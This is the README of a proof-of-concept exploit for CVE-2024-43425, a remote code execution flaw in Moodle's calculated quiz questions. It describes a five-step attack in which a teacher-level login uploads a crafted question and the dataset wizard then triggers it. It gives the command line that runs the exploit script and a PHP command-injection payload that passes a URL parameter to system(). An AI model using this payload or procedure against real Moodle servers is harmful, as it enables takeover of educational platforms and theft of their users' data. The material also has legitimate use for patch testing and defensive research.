# CVE-2024-43425-Poc
CVE Overview
CVE ID: CVE-2024-43425
Description: Moodle allows an authenticated teacher-level user to upload a malicious calculated question via the quiz editor interface.
Impact: Remote Code Execution (RCE)
Cause: Improper sanitization of mathematical payloads inside calculated questions, which leads to command injection through the dataset wizard.
##Requirements:
Valid login credentials
Access to quiz editing interface (usually a teacher or admin role)
Known cmid (quiz module ID) and courseid
##This script performs a 5-step attack:
Step Description
1️ Fetch login token (logintoken)
2️ Log in and establish a valid MoodleSession
3️ Extract sesskey, ctxid, and category from the quiz edit page
4️ Upload a specially crafted calculated question with an RCE payload
5️ Trigger the payload through the dataset wizard page
##Usage Instructions
Requirements:
Python 3
Python libraries: requests, bs4 (BeautifulSoup)
~~~
pip3 install requests bs4
~~~
~~~
python3 exploit_cve_2024_43425.py \
--url http://192.168.2.12/moodle \
--username test \
--password 'Test@123' \
--courseid 1 \
--cmid 1 \
--cmd 'whoami'
~~~
##Payload used:
~~~
answer[0] = "(1)->{system($_GET[chr(97)])}"
~~~
[4.0K] /data/pocs/a767e76dd6cc30ac0aad2bf820d1fd436ffab910
├── [9.6K] exploit.py
└── [1.2K] README.md
0 directories, 2 files